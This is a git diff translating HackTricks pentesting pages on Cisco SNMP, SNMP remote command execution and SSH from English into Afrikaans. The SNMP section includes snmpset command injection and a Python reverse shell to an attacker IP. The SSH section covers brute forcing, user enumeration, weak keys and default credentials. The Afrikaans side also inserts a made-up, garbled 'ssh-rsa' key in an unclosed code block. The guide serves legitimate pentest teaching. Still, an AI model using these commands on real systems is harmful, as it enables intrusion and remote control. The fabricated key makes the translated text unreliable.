+++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -2,59 +2,55 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-# Pentesting Cisco Networks
+# Pentesting Cisco-netwerke
 
-**SNMP** functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as passwords that enable communication between SNMP agents and servers. These strings are pivotal for they determine access levels, specifically **read-only (RO) or read-write (RW) permissions**. A notable attack vector for pentesters is the **brute-forcing of community strings**, aiming to infiltrate network devices.
-
-A practical tool for executing such brute-force attacks is **[onesixtyone](https://github.com/trailofbits/onesixtyone)**, which necessitates a list of potential community strings and the IP addresses of the targets:
+**SNMP** funksioneer oor UDP met poorte 161/UDP vir algemene boodskappe en 162/UDP vir valboodskappe. Hierdie protokol steun op gemeenskapsreekse, wat as wagwoorde dien wat kommunikasie tussen SNMP-agente en bedieners moontlik maak. Hierdie reekse is van kardinale belang omdat hulle toegangsvlakke bepaal, spesifiek **slegs-lees (RO) of lees-skryf (RW) toestemmings**. 'n Noemenswaardige aanvalsvektor vir pentesters is die **brute-krag-aanval op gemeenskapsreekse**, met die doel om netwerktoestelle binne te dring.
 
+'n Praktiese instrument vir die uitvoering van sulke brute-krag-aanvalle is **[onesixtyone](https://github.com/trailofbits/onesixtyone)**, wat 'n lys potensiële gemeenskapsreekse en die IP-adresse van die teikens vereis:
 ```bash
 onesixtyone -c communitystrings -i targets
 ```
-
 ### `cisco_config_tftp`
 
-The Metasploit framework features the `cisco_config_tftp` module, facilitating the extraction of device configurations, contingent upon acquiring an RW community string. Essential parameters for this operation include:
+Die Metasploit-raamwerk bevat die `cisco_config_tftp`-module wat die onttrekking van toestelkonfigurasies fasiliteer, afhangende van die verkryging van 'n RW-gemeenskapsnaam. Die noodsaaklike parameters vir hierdie operasie sluit in:
 
-- RW community string (**COMMUNITY**)
-- Attacker's IP (**LHOST**)
-- Target device's IP (**RHOSTS**)
-- Destination path for the configuration files (**OUTPUTDIR**)
+- RW-gemeenskapsnaam (**COMMUNITY**)
+- Aanvaller se IP (**LHOST**)
+- Teiken toestel se IP (**RHOSTS**)
+- Bestemmingspad vir die konfigurasie lêers (**OUTPUTDIR**)
 
-Upon configuration, this module enables the download of device settings directly to a specified folder.
+Na konfigurasie maak hierdie module die aflaai van toestelinstellings direk na 'n gespesifiseerde vouer moontlik.
 
 ### `snmp_enum`
 
-Another Metasploit module, **`snmp_enum`**, specializes in gathering detailed hardware information. It operates with either type of community string and requires the target's IP address for successful execution:
-
+'n Ander Metasploit-module, **`snmp_enum`**, spesialiseer in die versameling van gedetailleerde hardeware-inligting. Dit werk met enige tipe gemeenskapsnaam en vereis die teiken se IP-adres vir suksesvolle uitvoering:
 ```bash
 msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
 msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
 msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 ```
-
-## References
+## Verwysings
 * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-snmp/snmp-rce.md b/network-services-pentesting/pentesting-snmp/snmp-rce.md
index ff43b3eab..924bab741 100644
--- a/network-services-pentesting/pentesting-snmp/snmp-rce.md
+++ b/network-services-pentesting/pentesting-snmp/snmp-rce.md
@@ -1,83 +1,72 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 # SNMP RCE
 
-SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server.
+SNMP kan deur 'n aanvaller uitgebuit word as die administrateur sy verstekkonfigurasie op die toestel of bediener oorsien. Deur **SNMP-gemeenskap met skryfregte (rwcommunity)** op 'n Linux-bedryfstelsel te **misbruik**, kan die aanvaller opdragte op die bediener uitvoer.
 
-## Extending Services with Additional Commands
-
-To extend SNMP services and add extra commands, it is possible to append new **rows to the "nsExtendObjects" table**. This can be achieved by using the `snmpset` command and providing the necessary parameters, including the absolute path to the executable and the command to be executed:
+## Uitbreiding van Dienste met Ekstra Opdragte
 
+Om SNMP-dienste uit te brei en ekstra opdragte by te voeg, is dit moontlik om nuwe **rye by die "nsExtendObjects" tabel** te voeg. Dit kan bereik word deur die `snmpset`-opdrag te gebruik en die nodige parameters te voorsien, insluitend die absolute pad na die uitvoerbare lêer en die opdrag wat uitgevoer moet word:
 ```bash
 snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
 'nsExtendStatus."evilcommand"' = createAndGo \
 'nsExtendCommand."evilcommand"' = /bin/echo \
 'nsExtendArgs."evilcommand"' = 'hello world'
 ```
+## Inspruiting Opdragte vir Uitvoering
 
-## Injecting Commands for Execution
+Inspruiting van opdragte vir uitvoering op die SNMP-diens vereis die bestaan en uitvoerbaarheid van die opgeroepde binêre / skripsie. Die **`NET-SNMP-EXTEND-MIB`** vereis die verskaffing van die absolute pad na die uitvoerbare lêer.
 
-Injecting commands to run on the SNMP service requires the existence and executability of the called binary/script. The **`NET-SNMP-EXTEND-MIB`** mandates providing the absolute path to the executable.
-
-To confirm the execution of the injected command, the `snmpwalk` command can be used to enumerate the SNMP service. The **output will display the command and its associated details**, including the absolute path:
+Om die uitvoering van die ingespruite opdrag te bevestig, kan die `snmpwalk`-opdrag gebruik word om die SNMP-diens op te som. Die **uitset sal die opdrag en die verbandhoudende besonderhede** insluit, insluitend die absolute pad:
 ```bash
 snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
 ```
+## Uitvoering van die Geïnjecteerde Opdragte
 
-## Running the Injected Commands
+Wanneer die **geïnjecteerde opdrag gelees word, word dit uitgevoer**. Hierdie gedrag staan bekend as **`run-on-read()`**. Die uitvoering van die opdrag kan waargeneem word tydens die snmpwalk lees.
 
-When the **injected command is read, it is executed**. This behavior is known as **`run-on-read()`** The execution of the command can be observed during the snmpwalk read.
+### Verkryging van Bediener Skulp met SNMP
 
-### Gaining Server Shell with SNMP
-
-To gain control over the server and obtain a server shell, a python script developed by mxrch can be utilized from [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git).
-
-Alternatively, a reverse shell can be manually created by injecting a specific command into SNMP. This command, triggered by the snmpwalk, establishes a reverse shell connection to the attacker's machine, enabling control over the victim machine.
-You can install the pre-requisite to run this:
+Om beheer oor die bediener te verkry en 'n bediener skulp te verkry, kan 'n Python-skrips ontwikkel deur mxrch gebruik word vanaf [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git).
 
+Alternatiewelik kan 'n omgekeerde skulp handmatig geskep word deur 'n spesifieke opdrag in SNMP in te spuit. Hierdie opdrag, geaktiveer deur die snmpwalk, vestig 'n omgekeerde skulpverbinding met die aanvaller se masjien, wat beheer oor die slagoffer masjien moontlik maak.
+Jy kan die voorvereiste installeer om dit uit te voer:
 ```bash
 sudo apt install snmp snmp-mibs-downloader rlwrap -y
 git clone https://github.com/mxrch/snmp-shell
 cd snmp-shell
 sudo python3 -m pip install -r requirements.txt
 ```
-
-Or a reverse shell: 
-
+Of 'n omgekeerde dop:
 ```bash
 snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
 ```
-
-## References
+## Verwysings
 * [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-ssh.md b/network-services-pentesting/pentesting-ssh.md
index ce0cc27af..167ac200a 100644
--- a/network-services-pentesting/pentesting-ssh.md
+++ b/network-services-pentesting/pentesting-ssh.md
@@ -2,237 +2,221 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## Basic Information
+## Basiese Inligting
 
-**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.
-
-**Default port:** 22
+**SSH (Secure Shell of Secure Socket Shell)** is 'n netwerkprotokol wat 'n veilige verbinding met 'n rekenaar oor 'n onveilige netwerk moontlik maak. Dit is noodsaaklik vir die handhawing van die vertroulikheid en integriteit van data wanneer daar toegang tot afgeleë stelsels verkry word.
 
+**Verstekpoort:** 22
 ```
 22/tcp open  ssh     syn-ack
 ```
+**SSH-bediener:**
 
-**SSH servers:**
+* [openSSH](http://www.openssh.org) - OpenBSD SSH, verskep in BSD, Linux-distribusies en Windows sedert Windows 10
+* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) - SSH-implementering vir omgewings met lae geheue- en verwerkerhulpbronne, verskep in OpenWrt
+* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) - SSH-implementering vir Windows, die kliënt word algemeen gebruik, maar die gebruik van die bediener is seldsaam
+* [CopSSH](https://www.itefix.net/copssh) - implementering van OpenSSH vir Windows
 
-* [openSSH](http://www.openssh.org) – OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
-* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) – SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
-* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) – SSH implementation for Windows, the client is commonly used but the use of the server is rarer
-* [CopSSH](https://www.itefix.net/copssh) – implementation of OpenSSH for Windows
+**SSH-biblioteke (implementering van bedienerkant):**
 
-**SSH libraries (implementing server-side):**
+* [libssh](https://www.libssh.org) - multiplatform C-biblioteek wat die SSHv2-protokol implementeer met bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) en [R](https://github.com/ropensci/ssh); dit word deur KDE gebruik vir sftp en deur GitHub vir die git SSH-infrastruktuur
+* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) - SSHv2-bedienerbiblioteek geskryf in ANSI C en gemik op ingebedde, RTOS- en hulpbronbeperkte omgewings
+* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) - Apache SSHD Java-biblioteek is gebaseer op Apache MINA
+* [paramiko](https://github.com/paramiko/paramiko) - Python SSHv2-protokolbiblioteek
 
-* [libssh](https://www.libssh.org) – multiplatform C library implementing the SSHv2 protocol with bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) and [R](https://github.com/ropensci/ssh); it’s used by KDE for sftp and by GitHub for the git SSH infrastructure
-* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) – SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments
-* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – Apache SSHD java library is based on Apache MINA
-* [paramiko](https://github.com/paramiko/paramiko) – Python SSHv2 protocol library
-
-## Enumeration
+## Opname
 
 ### Banner Grabbing
-
 ```bash
 nc -vn  22
 ```
+### Outomatiese ssh-audit
 
-### Automated ssh-audit
+ssh-audit is 'n instrument vir die ouditering van ssh-bediener- en kliëntkonfigurasie.
 
-ssh-audit is a tool for ssh server & client configuration auditing.
+[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is 'n opgedateerde vurk van [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
 
-[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is an updated fork from [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
-
-**Features:**
-
-* SSH1 and SSH2 protocol server support;
-* analyze SSH client configuration;
-* grab banner, recognize device or software and operating system, detect compression;
-* gather key-exchange, host-key, encryption and message authentication code algorithms;
-* output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc);
-* output algorithm recommendations (append or remove based on recognized software version);
-* output security information (related issues, assigned CVE list, etc);
-* analyze SSH version compatibility based on algorithm information;
-* historical information from OpenSSH, Dropbear SSH and libssh;
-* runs on Linux and Windows;
-* no dependencies
+**Kenmerke:**
 
+* Ondersteuning vir SSH1- en SSH2-protokolbedieners;
+* analiseer SSH-kliëntkonfigurasie;
+* gryp banier, herken toestel of sagteware en bedryfstelsel, ontdek kompressie;
+* versamel sleuteluitruil, gasheksleutel, enkripsie en boodskapverifikasiekode-algoritmes;
+* uitvoer algoritme-inligting (beskikbaar sedert, verwyder/gedeaktiveer, onveilig/swak/oud, ens.);
+* uitvoer algoritme-aanbevelings (voeg by of verwyder gebaseer op herkenning van sagteware-weergawe);
+* uitvoer van veiligheidsinligting (verwante kwessies, toegewysde CVE-lys, ens.);
+* analiseer SSH-weergawe-verenigbaarheid gebaseer op algoritme-inligting;
+* historiese inligting van OpenSSH, Dropbear SSH en libssh;
+* werk op Linux en Windows;
+* geen afhanklikhede.
 ```bash
 usage: ssh-audit.py [-1246pbcnjvlt] 
 
-   -1,  --ssh1             force ssh version 1 only
-   -2,  --ssh2             force ssh version 2 only
-   -4,  --ipv4             enable IPv4 (order of precedence)
-   -6,  --ipv6             enable IPv6 (order of precedence)
-   -p,  --port=      port to connect
-   -b,  --batch            batch output
-   -c,  --client-audit     starts a server on port 2222 to audit client
-                               software config (use -p to change port;
-                               use -t to change timeout)
-   -n,  --no-colors        disable colors
-   -j,  --json             JSON output
-   -v,  --verbose          verbose output
-   -l,  --level=    minimum output level (info|warn|fail)
-   -t,  --timeout=   timeout (in seconds) for connection and reading
-                               (default: 5)
+-1,  --ssh1             force ssh version 1 only
+-2,  --ssh2             force ssh version 2 only
+-4,  --ipv4             enable IPv4 (order of precedence)
+-6,  --ipv6             enable IPv6 (order of precedence)
+-p,  --port=      port to connect
+-b,  --batch            batch output
+-c,  --client-audit     starts a server on port 2222 to audit client
+software config (use -p to change port;
+use -t to change timeout)
+-n,  --no-colors        disable colors
+-j,  --json             JSON output
+-v,  --verbose          verbose output
+-l,  --level=    minimum output level (info|warn|fail)
+-t,  --timeout=   timeout (in seconds) for connection and reading
+(default: 5)
 $ python3 ssh-audit 
 ```
+### Openbare SSH-sleutel van bediener
 
-[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
-
-### Public SSH key of server
-
+```plaintext
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz6Xz
 ```bash
 ssh-keyscan -t rsa  -p 
 ```
+### Swakker Sifer Algoritmes
 
-### Weak Cipher Algorithms
-
-This is discovered by default by **nmap**. But you can also use **sslcan** or **sslyze**.
-
-### Nmap scripts
+Dit word standaard ontdek deur **nmap**. Maar jy kan ook **sslcan** of **sslyze** gebruik.
 
+### Nmap skripte
 ```bash
 nmap -p22  -sC # Send default nmap scripts for SSH
 nmap -p22  -sV # Retrieve version
-nmap -p22  --script ssh2-enum-algos # Retrieve supported algorythms 
+nmap -p22  --script ssh2-enum-algos # Retrieve supported algorythms
 nmap -p22  --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
 nmap -p22  --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
 ```
-
 ### Shodan
 
 * `ssh`
 
-## Brute force usernames, passwords and private keys
+## Brute force gebruikersname, wagwoorde en private sleutels
 
-### Username Enumeration
-
-In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:
+### Gebruikersnaam Enumerasie
 
+In sommige weergawes van OpenSSH kan jy 'n tydaanval maak om gebruikers te enumereer. Jy kan 'n Metasploit-module gebruik om dit uit te buit:
 ```
 msf> use scanner/ssh/ssh_enumusers
 ```
-
 ### [Brute force](../generic-methodologies-and-resources/brute-force.md#ssh)
 
-Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below.
+Sommige algemene ssh-inloggegewens [hier](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) en [hier](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) en hieronder.
 
-### Private Key Brute Force
-
-If you know some ssh private keys that could be used... let's try it. You can use the nmap script:
+### Brute Force van Privaatsleutel
 
+As jy van sommige ssh-privaatsleutels weet wat gebruik kan word... laat ons dit probeer. Jy kan die nmap-skrips gebruik:
 ```
 https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
 ```
-
-Or the MSF auxiliary module:
-
+Of die MSF hulpprogram module:
 ```
 msf> use scanner/ssh/ssh_identify_pubkeys
 ```
+Of gebruik `ssh-keybrute.py` (native python3, lig en het ouer algoritmes geaktiveer): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
 
-Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
-
-#### Known badkeys can be found here:
+#### Bekende slegte sleutels kan hier gevind word:
 
 {% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
 
-#### Weak SSH keys / Debian predictable PRNG
+#### Swak SSH-sleutels / Debian voorspelbare PRNG
 
-Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced. Pre-generated sets of keys generated on Debian systems affected by weak PRNG are available here: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
+Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n drasties verminderde sleutelruimte wat gekraak kan word. Vooraf gegenereerde stelle sleutels wat gegenereer is op Debian-stelsels wat deur swak PRNG geraak is, is hier beskikbaar: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
 
-You should look here in order to search for valid keys for the victim machine.
+Jy moet hier kyk om te soek na geldige sleutels vir die slagoffer se masjien.
 
 ### Kerberos
 
-**crackmapexec** using the `ssh` protocol can use the option `--kerberos` to **authenticate via kerberos**.\
-For more info run `crackmapexec ssh --help`.
+**crackmapexec** wat die `ssh`-protokol gebruik, kan die opsie `--kerberos` gebruik om **teken te gee via Kerberos**.\
+Vir meer inligting, voer `crackmapexec ssh --help` uit.
 
-## Default Credentials
+## Standaardlegitimasie
 
-| **Vendor** | **Usernames**                                                                                               | **Passwords**                                                                                                                                                                                              |
-| ---------- | ----------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| APC        | apc, device                                                                                                 | apc                                                                                                                                                                                                        |
-| Brocade    | admin                                                                                                       | admin123, password, brocade, fibranne                                                                                                                                                                      |
